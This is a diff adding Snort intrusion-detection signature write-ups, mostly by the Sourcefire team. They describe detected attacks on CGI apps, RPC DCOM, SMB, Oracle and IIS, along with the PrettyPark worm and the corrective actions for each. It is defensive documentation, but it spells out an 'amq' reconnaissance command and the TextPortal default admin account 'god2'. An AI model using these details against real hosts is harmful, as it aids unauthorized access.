+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1720.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1720
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1953.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1953
+
+--
+Summary:
+This event is generated when a request is made to discover the Process ID (PID) of the Remote Procedure Call (RPC) amd.
+
+--
+Impact:
+Information disclosure.  This request can allow an attacker to discover the PID associated with amd.
+
+--
+Detailed Information:
+The amd RPC service implements the automounter daemon on UNIX hosts.  The amd service automatically mounts and unmounts requested file systems.  An attacker can make a request to amd to discover its PID.  Learning the PID may help an attacker guess a range of likely PIDs associated with other running services that are either started before or after amd.  This may facilitate an attack against other running processes.  
+
+--
+Affected Systems:
+Any system running amd.
+
+--
+Attack Scenarios:
+An attacker may request the PID associated with amd.  This information may be used to attack other running processes if the attacker has some means of access to the target host. 
+
+--
+Ease of Attack:
+Simple. Execute the command 'amq -p -T -h hostname/IP'.
+  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2993.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2993
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2805.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2805
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_columns
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1451.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1451
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2444.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2444
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
+the affected products.
+
+Due to insufficient bounds checking when ISS products parse protocol
+fields in ICQ SRV_META_USER data, a buffer overflow condition can be
+exploited to give an attacker the opportunity to execute arbitrary code
+and gain unauthorized administrative access to the host.
+
+It is possible that this condition can be exploited without the need for
+an established and valid ICQ session. The attacker could create packets
+originating from a host on port 4000 and send specially crafted data to 
+exploit the condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 22.11 and prior
+	RealSecure Server Sensor 7.0 XPU 22.11 and prior
+	RealSecure Server Sensor 6.5 for Windows SR 3.10 and prior
+	Proventia A Series XPU 22.11 and prior
+	Proventia G Series XPU 22.11 and prior
+	Proventia M Series XPU 1.9 and prior
+	RealSecure Desktop 7.0 ebl and prior
+	RealSecure Desktop 3.6 ecf and prior
+	RealSecure Guard 3.6 ecf and prior
+	RealSecure Sentry 3.6 ecf and prior
+	BlackICE Agent for Server 3.6 ecf and prior
+	BlackICE PC Protection 3.6 ccf and prior
+	BlackICE Server Protection 3.6 ccf and prior
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000745.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000745
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Diesel Joke Site" application running on a webserver. Access to the file "category.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "category.php" script used by the "Diesel Joke Site" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Diesel Joke Site
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1402.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1402
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3139.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3139
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/3202.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3202
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3367.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3367
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2145.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 2145
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application TextPortal. 
+
+--
+Impact:
+Potential administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to supply a known default administrator password for the php application TextPortal.
+
+The default administrator account 'god2' has known, weak passwords that could be used by an attacker to gain unauthorized access to the application.
+
+
+--
+Affected Systems:
+Any host using TextPortal.
+
+--
+Attack Scenarios:
+An attacker can log in to the application using the account god2 and gain administrator access to the site.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Disable the god2 account.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7673
+
+--
--- /dev/null
+++ b/doc/signatures/1668.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1668
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/772.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+772
+
+--
+Summary:
+This event is generated when the PrettyPark virus attempts to spread.
+
+--
+Impact:
+Possible virus infection. Attempt to spread a virus/trojan.
+
+--
+Detailed Information:
+Prettypark is a Win32 based Internet worm. This spreads through the Internet by attaching itself to email messages.
+
+When the attached file is executed, it checks for the existence of Prettypark in memory, if it is not present it then installs Prettypark. After infecting it sends messages to all the email addresses listed in the address book with an attachment containing the virus.
+
+Prettypark is capable of revealing passwords and connects to IRC channels. System access is possible.
+
+--
+Affected Systems:
+Windows 95, 98 and NT
+
+--
+Attack Scenarios:
+This is virus propogation activity.
+
+--
+Ease of Attack:
+
+Simple.
+
+--
+False Positives:
+
+Possible in certain mail content
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+ 
+Use an Anti-Virus tool to remove it.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+http://www.nwinternet.com/~pchelp/bo/prettypark.htm
+--
--- /dev/null
+++ b/doc/signatures/3182.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3182
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3282.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3282
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2013.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2013
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to view a 
+module the user does not have access to. Should this attempt be 
+succesful the entire CVS repository may be compromised.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+indicate determined activity by an attacker to gain unauthorized access 
+to the CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could choose to insert malicious code of his own 
+making.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to view a
+module the user may not have access to.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type the module name.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous cvs access to the server where appropriate.
+
+Maintain checks on the password database and the CVS repository.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
--- /dev/null
+++ b/doc/signatures/1166.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+Sid:
+1166
+
+--
+
+Summary:
+This event is generated when an attempt is made to download the file ws_ftp.ini
+via a web request.
+
+--
+Impact:
+Serious. Information Disclosure.
+
+--
+Detailed Information:
+When a user of WS_FTP chooses "save password" when connecting to an FTP
+server, the password is stored in the file ws_ftp.ini which may be
+accessible via a web server. The stored passwords use a weak encryption
+scheme that is easy broken.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+An attacker might be able to retrieve the file, use one of the widely
+available password cracking tools and gain valid login information to
+the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+Change all passwords used on the host.
+
+Disallow the use of ftp on the server, consider the use of scp to
+transfer files.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1613.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1613
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3365.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3365
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1111.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1111
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1495.txt
@@ -0,0 +1,69 @@
+Rule:
+
